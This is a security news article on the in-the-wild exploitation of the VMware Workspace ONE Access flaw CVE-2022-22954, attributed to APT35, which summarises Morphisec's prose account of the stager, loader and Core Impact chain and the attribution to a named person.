A significant remote code execution (RCE) vulnerability, CVE-2022-22954, in VMware Workspace ONE Access (formerly called VMware Identity Manager) is being actively exploited by advanced hackers. The vulnerability was fixed in a security update released 20 days ago, along with two more RCEs, CVE-2022-22957 and CVE-2022-22958, which target VMware Identity Manager (vIDM), VMware vRealize Automation (vRA), VMware Cloud Foundation, and vRealize Suite Lifecycle Manager.
Soon after the issues were made public, proof of concept (PoC) attack code appeared in the wild, allowing hackers to target vulnerable VMware product deployments. VMware confirmed that CVE-2022-22954 had been exploited in the wild. Morphisec researchers have discovered exploitation by advanced persistent threat (APT) actors, namely an Iranian hacker outfit known as APT35, aka “Rocket Kitten.”
The attackers acquire initial access to the environment by attacking CVE-2022-22954, the only RCE in the trio that does not need administrator access to the target server and has a publicly published proof-of-concept exploit. The attack begins with a PowerShell command that initiates a stager on the susceptible service (Identity Manager).
The stager then retrieves a highly disguised PowerTrash loader from the command and control (C2) server and installs a Core Impact agent into system memory. In this situation, Core Impact is a genuine penetration testing tool misused for evil objectives, similar to how Cobalt Strike is employed in malicious operations.
However, this isn’t a brand-new feature. APT35 has been accused by Trend Micro of abusing Core Impact in the past, with activities extending back to 2015.
“Morphisec research observed attackers already exploiting this vulnerability (CVE-2022-22954) to launch reverse HTTPS backdoors—mainly Cobalt Strike, Metasploit, or Core Impact beacons” - Morphisec.
According to Morphisec CTO Michael Gorelik, the attacker attempted lateral movement on the network despite shutting off the backdoor. Morphisec’s analysis further reveals that these sorts of attacks may overcome traditional defenses such as antivirus (AV) and endpoint detection and response (EDR) with privileged access.
Morphisec recovered the stager server’s C2 address, Core Impact client version, and the 256-bit encryption key used for C2 communication, finally tying the operation to a specific individual called Ivan Neculiti. Under that name, the ‘Hucksters‘ fraud exposure database lists business organizations registered in Moldova, Russia, and the United Kingdom, including a hosting firm that, as per the database, supports all types of unlawful websites, spam, and phishing activities.
It’s unclear whether Neculiti or its affiliated firms were participating in cybercrime efforts, consciously or unknowingly. Both hosting companies have yet to respond to requests for comment on the accusations mentioned in Morphisec’s report.